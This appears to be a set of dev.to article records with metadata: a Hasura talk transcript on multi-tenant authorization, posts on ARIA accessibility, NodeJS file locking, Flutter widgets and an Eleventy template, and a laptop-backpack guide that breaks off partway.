_As HasuraCon'21 is almost here, we thought it would be the perfect time to take a look back on all the amazing talks by our amazing speakers from 2020!_
_[You can sign up for HasuraCon'21 here!](https://hasura.io/events/hasura-con-2021/)_
_Here's Zachary's talk in video form:_
{% youtube jWFsMI5ffGM %}<figcaption>Architecture & Authorization For A Complex Multi-Tenant SaaS Platform With Hasura | Prefect by Zachary Hughes @HasuraCon'20</figcaption>
_And below is a text transcription of the talk for those who prefer reading! (The text is slightly paraphrased and edited here and there for clarity's sake.)_
**TRANSCRIPTION:**
Hey folks, thanks for coming. Today we're going to talk a little bit about architecture and authorization modeling for a complex multi-tenant SaaS platform. And why using Hasura to achieve this is a Hasura-fire way.
**A bit about me**
So for those of you who didn't hit “leave meeting” as soon as you heard that awful pun, let's get some introductions out of the way. My name is Zachary Hughes. I'm based in Washington DC, and I'm a cloud engineer at a company called Prefect. Here's a little bit of contact information, in case you want to reach me.
**The Agenda for today**
What are we going to be talking about today? We're going to start by talking a little bit about Prefect. I know it's HasuraCon and not PrefectCon, but context is helpful: understanding what Prefect is trying to do helps explain why we do what we do with Hasura. Once we've gotten that out of the way, we'll talk a little bit about the architecture and how Hasura fits in with Prefect's overall design.
Following that, we'll talk a little bit about using Hasura, both internally and externally — so, when people hit our API versus how we develop with it. And once that foundation is set, we'll talk a little bit about auth; that's gonna include roles, multi-tenancy, permissions, all that good stuff.
**About Prefect**
A little bit about Prefect, let's dive in.
At a really high level, Prefect is just responsible for making sure that workflows are executed properly. For any of y'all in the audience who might be fans of Hitchhiker's Guide to the Galaxy, the name is 100% inspired by that wonderful roving researcher Ford Prefect. It's a little bit of an homage.
**Prefect Core**
Prefect at the moment has two main components: Prefect Core, which is workflow management that takes your code and transforms it into a robust distributed pipeline that we call a flow, and Prefect Cloud, which is the layer of abstraction and orchestration on top of that.
This is an API as well as a UI that provides additional orchestration, observability, and auth and IAM data pipeline. Basically, all that stuff that you don't really have to worry about. We call that stuff negative engineering.
**Prefect Cloud**
Diving a little bit more deeply in Prefect Cloud, as we mentioned, it's a UI and an API that lets us manage scheduling your flows, which are those pipelines we discussed, helps you monitor and maintain the health of flows, and persist information about flow execution history.
This includes logs and flow states; flow states are basically just indicators of the history of the flow: when it started running, whether it failed or succeeded, any sort of information like that. And the great thing is, a significant portion of that is covered by Hasura.
**Prefect's Architecture**
Given that, let's talk a little bit about the architecture and how Hasura sort of fits into it.

Here's a high-level diagram of Prefect's architecture, it's a little bit pared down, but I don't want to bore you with the details. As you can see most of our compute is located in a GKE cluster. So let's start with the beginning.
We have an inbound request with the JWT in the header. That seems a little bit specific, but it's going to be important for our auth. Once the request hits the Apollo server, it talks to our auth service, verifies the token, and populates a role in a new JWT.
Once that new JWT has reached the Apollo server, it can take one of two paths. If the inbound request was a query, it's sent directly to Hasura. Or if it's a mutation, it takes a little bit of a detour. This detour takes it to Python business logic, bundled with an ORM. We'll get into the details of that a little bit later.
But the important part to consider right now is that once everything is said and done, this middleware posts any request to Hasura, and then everything ends up in Cloud SQL on the back end.
**JWT Contents**
Now digging a bit more into the JWTs we discussed earlier, it's important to consider that there are three pieces of content that are really important here.
We have a user ID, which indicates a specific user associated with this token, we have a tenant ID, which indicates the team this token belongs to. And we have a role, which indicates the user's role in Hasura.
**Example, before & after auth service**

So interestingly enough, when we first get our token, it doesn't have a role, we dynamically populate that. So if you notice, in this example, we have a tenant ID and a user ID, which we would expect, but we don't have a role.

However, once the Apollo server gets the token back from the auth service, it does have a role. Seems like a small detail, but it's going to be important as far as how we manage dynamic roles.
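In case the screenshots don't render, a sketch of what such a decoded payload might look like after the auth service has populated the role (claim names and values here are illustrative, following Hasura's usual JWT claim conventions, not Prefect's exact token):

```json
{
  "https://hasura.io/jwt/claims": {
    "x-hasura-user-id": "user-uuid-1234",
    "x-hasura-tenant-id": "tenant-uuid-5678",
    "x-hasura-default-role": "user",
    "x-hasura-allowed-roles": ["user"]
  }
}
```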
**Using Hasura**
Let's move on to how we actually use Hasura.
Consuming the Prefect API is pretty easy, and really anytime we consume the Prefect API, we consume the Hasura API. So as we discussed earlier, queries were sent directly to Hasura after the JWT is auth'd. Mutations take that detour that we discussed which goes to the Python business logic we've defined. And then any interaction between that business logic and Hasura is done via the ORM.
As far as humans go, everything is consolidated behind the Apollo server, so the user has a seamless experience. Everyone just hits api.prefect.io and they're good to go. And then, half in jest, half serious: I have tried each of these approaches by hand, and they're each as painful as they sound. We're getting a little bit more into the detail, but it's been really delightful letting Hasura handle all of this stuff.
**The ORM**
Speaking of the ORM, let's give it a little bit of attention, because it is super nice, and it helps improve the productivity of our internal dev experience. The ORM is just a lightweight layer in front of Hasura. It's implemented in Python, handles the actual serialization logic, and lets us interact with Hasura in a convenient manner.
Rather than having to open up the session, post everything, every time you want to talk to Hasura, we just use our ORM. Another nice thing about this is that the ORM operates within a token context that's populated by the JWT we've been discussing. This sounds like another implementation detail, but it's actually really nice because by using the ORM in conjunction with the token context, it means that every time we send something to Hasura using the ORM, we have pre-populated tenant IDs and user IDs for the roles and the header. This lets us sort of delegate our permissions work to Hasura without having to handle anything else on the front end.
Moving over, here are just some samples of what this actual ORM looks like. A query would look fairly simple and lightweight: `models.Flow.where`, we define our WHERE clause — let's say something like name is equal to "foo" — and then we just get it. Similarly, if we wanted to insert something, we'd say `models.Flow`, define our actual flow (name, the tasks inside the flow, yada, yada), and then we'd go ahead and insert it.
**Auth**
So with that foundation layer, let's talk a little bit about auth.
Our auth model has three main components. We have users, who represent individual consumers of Cloud (sounds a little bit silly to define that), and users have a role. We have memberships, which link a user's role to a team. And then we have teams, which are effectively tenants: groups of people working with the same flows, who have access to the same resources, like flows, projects, all that good stuff.
Users and tenants both have unique IDs (we use UUIDs), and these IDs are used to enforce role-based permissions. They both make liberal use of Hasura relationships. This is partially to help improve the querying experience, and partially to help improve data integrity. And it's worth noting that users and tenants are many-to-many in our model: users can belong to one or more tenants and can switch between them, and tenants can have one or more users.
**Examples**

So with that out of the way (I know it's a lot of text), let's take a look at an example. Let's check out our flow's tenant ID. Our flow table has a tenant ID column, which maps to the ID column of a tenant. This helps us enforce our row permissions, which are here, where we check to make sure that our tenant ID is equal to the X-Hasura-Tenant-Id. That X-Hasura-Tenant-Id is part of what's passed through by our ORM, or populated directly if it came in via a query.
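For reference, a row permission like the one described is expressed in Hasura as a boolean expression comparing the column against the session variable, roughly like this (column name assumed from the talk):

```json
{
  "tenant_id": {
    "_eq": "X-Hasura-Tenant-Id"
  }
}
```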
**Roles**
So roles, these are important. Users have access to four primary roles.
We have a login role, which is sort of invisible, allows users to view information necessary to find and select their membership. Once they've found and selected their membership, we have three remaining roles.
We have a read-only user, just sort of what it says on the tin. It allows the user to view everything in a given tenant, but not update or insert anything. It's sort of an observer/auditor-type role.
We have users who are sort of day-to-day folks using the system. This gives the user everything they need to do in order to operate in that tenant. That means they can view things, they can kick off and create flows, create projects, update states, whatever you'd like.
And then we have tenant admins, which give the user the ability to actively manage everything in that tenant. This includes things like billing. It also includes managing things like who actually belongs to a tenant. If you have a bad actor, then admins have the ability to remove them.
We also have a fifth role called runner, which is less crucial to how users actually interact with the system, but it's important for our orchestration, we're just gonna leave that off for the time being.
**Roles Example**

As an example, let's take a look at this. You can see right off the bat that our permissions are actually fairly granular, and they're not at all standard. Certain things have permissions for everything. Certain things have no permissions.

This is our membership table. So let's see who can do what. A user has permission to delete a membership that matches their user ID. This makes a fair amount of sense, right, because a user should be able to remove themselves from a tenant if they would like. But they shouldn't be able to actually remove someone else.
On the other hand, a tenant admin who is responsible for managing the tenant as a whole has permission to remove any membership that matches their tenant ID, which gives them a bit more power. This is a really nice, clean illustration of how you can actually give tenant and user permissions, and use roles in conjunction with them to help that intersection be a little bit more manageable.
**Switching** **Tenants**
So with all this in mind, switching tenants is actually super easy. And a key part of what we do as far as multi-tenancy goes. With this pattern in place that we've discussed, switching tenants is just as easy as issuing a new JWT. You issue a new JWT, that populates the new context, which defines the user ID, the tenant ID, and the role. And then once that's all said and done, you can move on to another tenant.
**No need to write custom permissions & auth with Hasura**
So something I want to call out here is using roles and role-based permissions lets us delegate permissions in Hasura which sounds sort of obvious, but it's something I know I take for granted since I've been working with Hasura for long enough. I've written custom permissions before as well as custom auth, and it is so painful. I would officially like to never write one again. I am sure there are folks out there who are great at it. And I'm sure there are folks out there who might even enjoy it. It's not really where I'd like to focus my attention.
**Views can help us**
But there is one gotcha. What if you want to allow folks with the user role to view other users in their tenant? It's a little bit tricky. In this case, the pattern we've landed on is views. We can define a view and map memberships, roles, and permissions to it, the same way we would for any other table. So by defining views alongside your tables, you can define an entirely separate set of permissions to fit your needs. In this case, we want users to be able to see the email, first, and last name of other users, but no more. And by using views and defining a separate set of permissions there, it allows us to take the union of what they can do.
**Parting Thoughts**
So I'd like to leave with a couple of parting thoughts. The big thing is between its GraphQL capabilities and flexible permission schema, Hasura roughly halves the amount of time it would take us to add and expose a data model. I cannot say just how nice it is to be able to implement a feature, create our new model, define how users will query for it, and have that be the easiest part of our system. We basically define our permissions, we make sure that our tenant guards are in place, and we're good to go.
**Thanks!**
And that about wraps it up. I really appreciate your attendance. I'll be sticking around to answer any questions and if you want to contact me, do so at zachary@prefect.io | hasurahq_staff |
709,347 | JavaScript resources you must bookmark. | These are some great resources to consume as a JS developers. | 0 | 2021-05-26T15:44:29 | https://dev.to/pranavkumar389/javascript-resources-you-must-bookmark-4j3d | javascript | ---
title: JavaScript resources you must bookmark.
published: true
description: These are some great resources to consume as a JS developers.
tags: JavaScript
//cover_image: https://direct_url_to_image.jpg
---
1. JavaScript runtime visualizer
https://www.jsv9000.app/
2. Interactive JavaScript Tutorial
https://www.learn-js.org/en/
3. JavaScript Tutorial
https://www.javascripttutorial.net/
4. A Modern JavaScript Tutorial
https://javascript.info/
5. JavaScript Algorithm - 30 seconds of code
https://www.30secondsofcode.org/js/p/1
6. Build 30 things with vanilla JS in 30 days
https://javascript30.com/
7. JavaScript - The Right Way
https://jstherightway.org/
8. Free JavaScript Resources
https://www.java5cript.com/
Tip: Pick one resource at a time. Enjoy the great content.
| pranavkumar389 |
709,379 | Make your Website accessible for people with eye👁 disablities | Before getting in to the article I would like to ask you all a question ! How people with eye disab... | 0 | 2021-05-26T16:42:56 | https://dev.to/karthick30/make-your-website-accessible-for-people-with-eye-disablities-3008 | react, webdev, html, ux | Before getting in to the article I would like to ask you all a question !
```How do people with eye disabilities use your website? Is the website you've made accessible to them?```
Wait! What? Is there a scenario like that? 😳 🙄 🤔 😲 these were my reactions and the questions I had soon after this question was thrown at me. Come on, I've been doing stuff on the web for over 4 years but never thought of this scenario, and I was clueless to answer it.
But the reality is a big **"YES"**, there is a way! To be frank, this was even more shocking than the question itself. Again the same set of reactions, but this time they've doubled 😳 🙄 🤔 😲 😳 🙄 🤔 😲.
Ok, if yes, then how?? Many of us would have used these things without knowing their use cases.
## Aria Tags
Yeah, aria tags are the game changer here; they have the capacity to handle this tricky use case.
> **Accessible Rich Internet Applications (ARIA)** is a set of attributes that define ways to make web content and web applications (especially those developed with JavaScript) more accessible to people with disabilities. _stated in MDN_
Have you researched the usage of these tags while using them? I didn't 🙋🏾! I thought they were only used for SEO kinds of things. Another thing: the other attributes we use can be accessed somehow, like using

* document.getElementById("demo");
* document.getElementsByClassName("demo-class");
* document.getElementsByName("demo-input");
* document.getElementsByTagName("input");
or you can access the values in an event handler like onChange using ```e.target.value , e.target.name ```
But have you tried accessing these aria tags?? Just try! They can't be accessed like the other attributes; that's not what they were built for. Why? Because ARIA doesn't augment any of the element's inherent behavior.
>ARIA works by changing and augmenting the standard DOM accessibility tree.
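To make this concrete, here's a small sketch of common aria- attributes in plain HTML (the attribute choices here are illustrative; always check the ARIA docs for the right pattern for your widget):

```html
<!-- A screen reader announces the label, the required state, and
     the error message tied to the input via aria-describedby. -->
<label for="email">Email</label>
<input
  id="email"
  type="email"
  aria-required="true"
  aria-invalid="true"
  aria-describedby="email-error"
/>
<p id="email-error" role="alert">Please enter a valid email address.</p>

<!-- An icon-only button gets an accessible name via aria-label -->
<button aria-label="Close dialog">✕</button>
```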
## Screen Reader
So we've added the aria tags, but how will they be read out for people with disabilities? Here comes the next life saver: the screen reader. A screen reader is an app which makes use of these aria tags and produces helpful voice output so people can use the website. They are available as desktop apps and also as Chrome extensions. Check one of them [here](https://chrome.google.com/webstore/detail/screen-reader/kgejglhpjiefppelpmljglcjbhoiplfn/related)
Here I've created a small form using React that supports aria tags. Install the extension mentioned above, close your eyes, and try submitting the form! Let me know if you've made it!
{% codesandbox bold-hertz-tcrvp %}
These attributes starting with aria- are the thing we're talking about !!
 .
That's it! So next time you build an application, make sure it supports aria tags. Technology is not just for particular people; make technology accessible for everyone 💪🏽
_Get into these docs before starting aria tags_
https://developer.mozilla.org/en-US/docs/Web/Accessibility/ARIA
https://developers.google.com/web/fundamentals/accessibility/semantics-aria
Manage your Work From Home 🏡 issues using this [kit](https://dev.to/karthick3018/manage-work-from-home-effectively-using-wfh-kit-6bc)
------------
*check my dev projects on* [github](https://github.com/karthick3018)
*Follow me on* [twitter](https://twitter.com/Karthick_R_30)
*connect with me on* [linkedIn](https://www.linkedin.com/in/karthick-raja-dev/)
*check my styles on* [codepen](https://codepen.io/karthick30)
-------------
*Thanks for your time*
*Happy coding ! Keep Sharing*
*Stay Safe*
| karthick30 |
709,386 | online compiler for latex | check online latex compiler LaTeX is a software system for document preparation. When writing, the wr... | 0 | 2021-05-26T17:09:10 | https://dev.to/sachinp67495829/online-compiler-for-latex-575a | latex, compiler, online | check <a href="https://pythonslearning.com/2021/05/which-is-free-online-compiler-editor-for-latex.html">online latex compiler
LaTeX</a> is a software system for document preparation. When writing, the writer uses plain text as opposed to the formatted text found in "What You See Is What You Get" word processors like Microsoft Word, LibreOffice Writer and Apple Pages
Resources : https://pythonslearning.com/2021/05/which-is-free-online-compiler-editor-for-latex.html
| sachinp67495829 |
709,717 | #SpeedOfLife First Week Recap | It Begins We started the #SpeedOfLife campaign last week, yay! It has been a bumpy start but we're... | 12,585 | 2021-05-27T01:43:38 | https://dev.to/armory/speedoflife-first-week-recap-6i2 | speedoflife, softwaredelivery | <h3>It Begins</h3>
We started the #SpeedOfLife campaign last week, yay!
It has been a bumpy start but we're happily moving forward. The first person I spoke with about delivering software at the speed of life was our CEO at Armory, DROdio. I posted a snippet of our conversation on Twitter last week and here that is 👇🏾
{% twitter 1390707475784011778 %}
A live stream happened.
{% youtube VfpuJckT_Tw %}
I'll let you be the judge of whether or not it was successful. It was mildly chaotic on my end but next time it will be better, I promise! We had at least one live viewer (shoutout to Morgan Lucas) and something awesome came out of my call into the void for a last-minute guest.
{% twitter 1390809997789982724 %}
I got a DM from a Performance Engineering Lead at MathWorks. She's interested in collaborating so hopefully I will be able to share a conversation between the two of us soon. I was able to chat with several people from the Armory crew about #SpeedOfLife and what it means to them. It's awesome to share their perspectives, but I'm super-excited to involve more of the DevOps community.
Look out for #SpeedOfLife on our social channels. I'll be back next Tuesday with another blog. | nikema |
709,856 | A deep dive into file locking with NodeJS | I developed a version control software for graphic designers and 2D/3D artists called Snowtrack in An... | 0 | 2021-06-07T14:21:15 | https://dev.to/sebastianrath/today-i-released-a-version-control-software-for-2d-3d-artists-and-graphic-designers-made-in-angular-electron-nck | typescript, angular, javascript, node | I developed version control software for graphic designers and 2D/3D artists called [Snowtrack](https://www.snowtrack.io) using Angular and Electron. In this blog post, I will cover some of the technical challenges around file locking that I faced during the development of Snowtrack.
## What is Snowtrack?
Snowtrack is an intuitive, easy-to-use, and super-fast version control software for graphic projects. Its purpose is to make version control accessible to graphic designers and 2D/3D artists with a non-technical workflow.
To get a better understanding of Snowtrack's user interface, check out the following screenshot:

## What I used to build it
For the UI application I used a combination of Angular and Electron. The underlying version control engine is called **SnowFS**, an open-source project I developed as a fast and simple alternative to *Git* and *Git LFS*. Feel free to check it out on [GitHub](https://github.com/snowtrack/snowfs). A few months ago I wrote a blog post about it [here](https://dev.to/sebmtl/snowfs-let-s-bring-version-control-to-graphic-projects-10p8) on *dev.to*.
## Technical challenge no. 1
Graphic projects can differ tremendously in size, from a single Photoshop file up to a 50 GB file set of 3D scenes, textures, and assets. Each project type comes with its own set of problems. In the following, I want to clear up some misconceptions around *file locking*.
## File Locking
Take a look at the code snippet below.
```javascript
// Process 1
fd = fs.openSync("/tmp/foo", "w");

// Process 2
fd = fs.openSync("/tmp/foo", "w");
```
Imagine more than one process wants to open the same file at the same time. What do you think will happen?
**Answer:** It depends on the OS, and on whether you're the maintainer of all the processes involved.
When you call `fs.openSync` NodeJS will forward the call behind the scenes to an OS function as you can see from [this C code](https://github.com/libuv/libuv/blob/b201c1a0f0b1ba2365dc285f466ff6fe5307decf/src/unix/fs.c#L380-L389)
```cpp
static ssize_t uv__fs_open(uv_fs_t* req) {
return open(req->path, req->flags | O_CLOEXEC, req->mode);
}
```
The function `open(..)` is an OS function and available in all operating systems. But the internals of this function differ between Windows, Linux and macOS so I will cover them separately.
## macOS/Linux
Technically, neither macOS nor Linux has a true file-locking mechanism. Although you can read- or write-lock a file using a function called [`fcntl`](https://man7.org/linux/man-pages/man2/fcntl.2.html), only programs which use this function regard and respect the file lock. This means any other process which **doesn't** use `fcntl` and directly wants to open a file can acquire a file handle and manipulate the content as long as the file permissions allow it. What a bummer.
That's why file locking on macOS and Linux is also called ["advisory file locking"](https://news.ycombinator.com/item?id=17601581).
## Windows
Windows is more complicated in that matter. Windows offers two functions to open a file. Either through the Windows API function called [CreateFile](https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-createfilea) (yes, that's really the name to open files),...
...or through [`open(..)`](https://docs.microsoft.com/en-us/cpp/c-runtime-library/reference/open?view=msvc-160). But the `open(..)` function on Windows is a POSIX extension and uses `CreateFile` internally as well.
As we've seen above NodeJS uses `open(..)`, but since we know that this is just a wrapper for `CreateFile`, let's check out that function:
```cpp
// The low-level open function of Windows.
HANDLE CreateFile(
LPCSTR lpFileName,
DWORD dwDesiredAccess,
DWORD dwShareMode,
LPSECURITY_ATTRIBUTES lpSecurityAttributes,
DWORD dwCreationDisposition,
DWORD dwFlagsAndAttributes,
HANDLE hTemplateFile
);
```
`CreateFile` has a parameter called `dwShareMode`. A file that is opened with `dwShareMode=0` **cannot** be opened again until its handle has been closed.
So if you use `open(..)` on a file that was already open by another process with `CreateFile(…, dwShareMode=0)` you receive this error message:
> The process cannot access the file because it is being used by another process
On the other hand, if you use `fs.openSync` in NodeJS, or `open(..)` in C/C++, to open a file that hasn't been opened yet, you cannot prevent another application from modifying it*.
\* Unless you use file permissions as a workaround, but that’s not really a file lock.
To prove this, you will see that our `fs.openSync` call executes `CreateFile` with the read/write shared flags to comply with the POSIX standard.

This means on Windows you cannot prevent another application from opening and modifying your file if you don't use `CreateFile`.
## What does this have to do with Snowtrack?
Imagine a user saving a big file in a graphic application and while the file is still being written to disk, the user attempts to commit the file change. How does Snowtrack deal with this?
As we learned, `open(..)` provides no file locking, most applications don't even follow a locking protocol, and Snowtrack cannot control how Photoshop, Blender, and co. open and write their files.
This means the only reliable chance of detecting if a file is still being written by another process is to check prior to a commit if any process on the system has a write handle on that file.
- On Windows, I solved this with a custom helper process and the Windows API of [Restart Manager](https://docs.microsoft.com/en-us/windows/win32/rstmgr/about-restart-manager), which is mainly used by installers to ensure the files they are about to replace are no longer open.
- On macOS I invoke the system process [`/usr/sbin/lsof`](https://ss64.com/osx/lsof.html) (list open files), restricted to the working directory to speed up the execution of this command.
### What else?
The development of Snowtrack came with countless technical challenges and I would be happy to share more insights.
*File locking*, *Electron/Angular* *race conditions*, *I/O saturation*, *build server*, *update mechanisms*, *edge cases*, .. with this project I touched many subjects and I would be happy to write a follow-up blog post if you are interested. Let me know in the comments below.
If you want to support SnowFS, Snowtrack or me then feel free to join me on [Twitter](https://twitter.com/snowtrack_io).
Thanks for reading :-)
## TLDR
Don't get me started on file-locking.
## Addendum: What about the *"File In Use"* dialog in Windows?
If you are a Windows user you might have seen this error message before:

Windows, or rather NTFS, behaves very differently compared to other file systems like *HFS+*, *APFS*, *ext3*, and so on.
There is no equivalent to inodes in NTFS, and therefore no garbage collection deletes a file when the last handle to an already deleted file is closed. The *File in Use* dialog only indicates that if any process has a file handle to a given file (no matter how it got opened), the file cannot be renamed, moved, or deleted. That does not imply a file lock on the file content. | sebastianrath |
709,935 | First Video | https://www.youtube.com/watch?v=F16svetYoaM | 0 | 2021-05-27T08:20:49 | https://dev.to/devpaulius/first-video-5dcm | firstpost, video, firstvideo, firsttime | https://www.youtube.com/watch?v=F16svetYoaM | devpaulius |
710,099 | This is my First Ever Post in this website.. | A post by The Planet | 0 | 2021-05-27T12:13:02 | https://dev.to/sreekanth99/this-is-my-first-ever-post-in-this-website-139m | sreekanth99 | ||
710,174 | Top 11 Flutter Widgets To Know In 2021 | These days, flutter is one of the most popular framework for developing mobile, web and desktop appli... | 0 | 2021-05-27T14:21:52 | https://dev.to/ltdsolace/top-11-flutter-widgets-to-know-in-2021-3i35 | flutter, apps, android | These days, Flutter is one of the most popular frameworks for developing mobile, web, and desktop applications, and its rich set of widgets is a big part of what makes it so sustainable. Flutter widgets are used for developing high-quality cross-platform applications because they are customizable and offer the flexibility and fluidity to fit almost any type of mobile app. Widget elements are organized in the form of a widget tree, and the manner in which the widgets are placed defines how the front end of the application's screen operates. The two primary aspects of a Flutter widget are its configuration and its state. There are lots of Flutter widgets available, and here we'll discuss the top 11 for developing Flutter apps. Before digging into the list, let us look at the types of Flutter widgets.
See also: Amazing New Features Of Flutter 2.0
# Types Of Flutter Widgets
There are two types of widgets in Flutter: the Stateless widget and the Stateful widget. Based on these two types, widgets are further organized into 14 different categories, including Async, Accessibility, Assets/Images/Icons, Layout, Interaction Models, Material Components, Animation and Motion, Painting and Effects, Styling, and Text.
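As a rough sketch of the two types (the widget names `Greeting` and `Counter` here are invented examples, not from the original post), a stateless widget carries only immutable configuration, while a stateful widget pairs a configuration object with a separate mutable `State`:

```dart
import 'package:flutter/material.dart';

// A StatelessWidget: configuration only, no mutable state of its own.
class Greeting extends StatelessWidget {
  const Greeting({Key? key, required this.name}) : super(key: key);
  final String name;

  @override
  Widget build(BuildContext context) => Text('Hello, $name!');
}

// A StatefulWidget: the widget holds the configuration,
// while the associated State object holds the mutable data.
class Counter extends StatefulWidget {
  const Counter({Key? key}) : super(key: key);

  @override
  State<Counter> createState() => _CounterState();
}

class _CounterState extends State<Counter> {
  int _count = 0;

  @override
  Widget build(BuildContext context) => TextButton(
        onPressed: () => setState(() => _count++),
        child: Text('Pressed $_count times'),
      );
}
```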
# Top 11 Flutter Widgets
**1. SafeArea**
This widget is best for developing dynamic and adaptive UIs. It helps the screen adjust to devices of different widths and heights, and it overcomes the area constraints introduced by the status bar, notches, the navigation bar, and so on. Its implementation doesn't allow the design to overlay any area where there is a front-end visibility constraint, which keeps the layout error-free. Hence, the SafeArea widget is also known as a padding widget: it adds padding to Android or iOS apps wherever there is a constraint. SafeArea will also indent the child with the necessary padding, particularly on devices with a notch like the iPhone X.
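A minimal sketch of typical SafeArea usage (illustrative only, not from the original post):

```dart
// Wrapping the body in SafeArea keeps content clear of the status bar,
// notch, and system navigation areas.
Scaffold(
  body: SafeArea(
    child: Text('This text is never hidden behind the notch'),
  ),
)
```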
**2. ConstrainedBox**
This is a built-in widget in the Flutter SDK, generally used to add size limitations to child widgets. It allows developers to add flexibility with respect to the height and width of a child widget. The widget has a limitation, though, when the child is bigger than the container: it cuts off the child's view, making the front end look somewhat out of line. This issue can be tackled by not defining the maxHeight property, leaving it at its default value of double.infinity.
For example, if you wanted the child to have a minimum height of 50.0 logical pixels, you could use `const BoxConstraints(minHeight: 50.0)` as the constraints.
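That textual example could look like this in code (a sketch; the `Card` child is just an arbitrary choice):

```dart
// The child is forced to be at least 50 logical pixels tall.
ConstrainedBox(
  constraints: const BoxConstraints(minHeight: 50.0),
  child: const Card(child: Text('At least 50px tall')),
)
```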
**3. Align Widget**
You need to organize components inside the UI, and Flutter composes these widgets together. But how do we position a child within a parent widget? We can use the Align widget: for instance, to choose the position of a text element inside a container.
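For instance, aligning a text element to the bottom-right of a container could look like this (illustrative sketch):

```dart
// Align places the Text in the bottom-right corner of the Container.
Container(
  width: 200,
  height: 200,
  color: Colors.blue,
  child: const Align(
    alignment: Alignment.bottomRight,
    child: Text('Aligned text'),
  ),
)
```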
Know more at: https://solaceinfotech.com/blog/top-11-flutter-widgets-to-know-in-2021/ | ltdsolace |
710,326 | The Ultimate Eleventy Template for your blog with a FREE minimalist theme [Open Source] | A free and open source Eleventy template with Tailwind CSS 2, Webpack 5, ESLint, Prettier, Image optimization, SEO friendly and Netlify CMS. Download the best Eleventy Themes and Templates. | 0 | 2021-05-27T15:18:16 | https://dev.to/ixartz/the-ultimate-eleventy-template-for-your-blog-with-a-free-minimalist-theme-open-source-3h47 | webdev, tailwindcss, javascript, showdev | ---
title: The Ultimate Eleventy Template for your blog with a FREE minimalist theme [Open Source]
published: true
description: A free and open source Eleventy template with Tailwind CSS 2, Webpack 5, ESLint, Prettier, Image optimization, SEO friendly and Netlify CMS. Download the best Eleventy Themes and Templates.
tags: webdev, tailwind, javascript, showdev
cover_image: https://creativedesignsguru.com/demo/Eleventy-Starter-Boilerplate/assets/images/posts/eleventy-js-starter-boilerplate.png
---
Yesterday, I updated my 11ty starter code to the latest versions of Tailwind CSS 2 and Webpack 5. It's built with developers in mind, with great tooling such as ESLint and Prettier. The template is production-ready with SEO features, and it also includes a little bonus: Netlify CMS (optional).
You can test the template at [Eleventy Template live demo](https://creativedesignsguru.com/demo/Eleventy-Starter-Boilerplate/)
If you are interested you can view the source code at [Eleventy Template GitHub Repo](https://github.com/ixartz/Eleventy-Starter-Boilerplate)
- 🔥 11ty for SSG
- 🎨 Integrate with Tailwind CSS
- ⚡️ Lazy load images with lazysizes
- ✨ Compress image with Imagemin
- 🎈 Syntax Highlighting with Prism.js
- ☕ Minify HTML & CSS with HTMLMinifier and cssnano
- ✏️ Linter with ESLint
- 🛠 Code Formatter with Prettier
- 💨 Live reload
- 📦 Module Bundler with Webpack
- 🦊 Templating with EJS
- 🤖 SEO metadata and Open Graph tags
- ⚙️ JSON-LD for richer indexing
- 🗺 Sitemap.xml
- ⚠️ 404 page
- 📖 Pagination
- ✅ Cache busting
- 💯 Maximize lighthouse score
- 🌈 Include a FREE minimalist blog theme
- 🗒 Netlify CMS (optional)
{% github ixartz/Eleventy-Starter-Boilerplate %}
## Built with latest technologies
- Eleventy
- Tailwind CSS 2.0
- Webpack 5
- ESLint
- Prettier
## Other 11ty Templates and Themes
You can also check my other Eleventy templates at:
| [Blue Dark Eleventy Theme](https://creativedesignsguru.com/blue-dark-eleventy-theme/) | [Blue Eclatant Eleventy Theme](https://creativedesignsguru.com/blue-eclatant-eleventy-theme/) |
| --- | --- |
| [](https://creativedesignsguru.com/blue-dark-eleventy-theme/) | [](https://creativedesignsguru.com/blue-eclatant-eleventy-theme/) |
| [Blue Modern Eleventy Theme](https://creativedesignsguru.com/blue-modern-eleventy-theme/) | [Blue Minimalist Eleventy Theme](https://creativedesignsguru.com/blue-minimalist-eleventy-theme/) |
| --- | --- |
| [](https://creativedesignsguru.com/blue-modern-eleventy-theme/) | [](https://creativedesignsguru.com/blue-minimalist-eleventy-theme/) |
You can easily customize the themes based on your needs by saving you development and design time. | ixartz |
710,366 | 10 Laptop Backpack Recommendations for the Remote Software Developer in 2021 | One of the joys of remote work is that you can work wherever there’s good wifi. Coffee shops? Check.... | 0 | 2021-06-22T10:30:52 | https://x-team.com/blog/backpacks-recommendations/ | remoteworking, travel, backpack, productivity | ---
title: 10 Laptop Backpack Recommendations for the Remote Software Developer in 2021
published: true
date: 2021-05-27 11:49:00 UTC
tags: remoteworking,travel,backpack,productivity
canonical_url: https://x-team.com/blog/backpacks-recommendations/
---
One of the joys of remote work is that you can work wherever there’s good wifi. Coffee shops? Check. Co-working spaces? Check. On top of [Table Mountain in South Africa](https://x-team.com/blog/x-outpost-south-africa/)? Also check. But in order to work wherever you want, you need a good laptop backpack. Here are 4 factors you need to consider when you’re in the market for a backpack, as well as 10 specific laptop backpacks we recommend.
## 4 Factors to Consider in a Laptop Backpack
### Comfort
A good laptop backpack is comfortable. Adjustable straps, a hip belt, a mesh covering to avoid a sweaty back, and internal framing to distribute weight all help to make a backpack feel comfortable. Material plays a big role in comfort too, because canvas and leather backpacks are heavier than nylon and polyester backpacks.
Comfort is even more important when your laptop backpack will function as a travel backpack as well. In such cases, visit a shop and try out a few backpacks to see how comfortable they are instead of ordering one blindly online.
### Sturdiness
A laptop can cost thousands of dollars, so you want a backpack that properly protects it when you’re moving about. Ideally, this means a separate compartment and sleeve for your laptop, plus plenty of padding at the backpack's top, bottom, and sides.
It also means that your backpack should be water-resistant, including the zippers. You’ll inevitably come across a scenario where it starts pouring rain and you don’t have an umbrella. No water should be able to enter the backpack; your gear should always be fully protected.
### Capacity
Consider the size of your device before buying a laptop backpack. While most backpacks can fit a 16” MacBook Pro, finding a backpack that can fit anything larger is much more difficult (17” laptops, anyone?). In addition, think about what else you tend to take with you. Books? A camera? A notepad? Take those into account when making a purchasing decision.
Backpacks are measured in liters. Anything between 10-16 liters should just about fit a laptop and a few books, while anything that’s 20-25 liters should be okay for most purposes. Anything above 30 liters comes in handy for weekend trips or for those packing professional camera gear.
### Warranty
Here’s a good rule of thumb when it comes to warranty: the better the product, the better the warranty. Companies that make quality backpacks are often willing to back up their claim with generous warranties.
At some point, your backpack will malfunction (probably a zipper, it’s always a zipper). A company that repairs issues for free for the lifetime of the backpack comes in real handy when this happens.
## 10 Great Laptop Backpacks in 2021
### Db Scholar

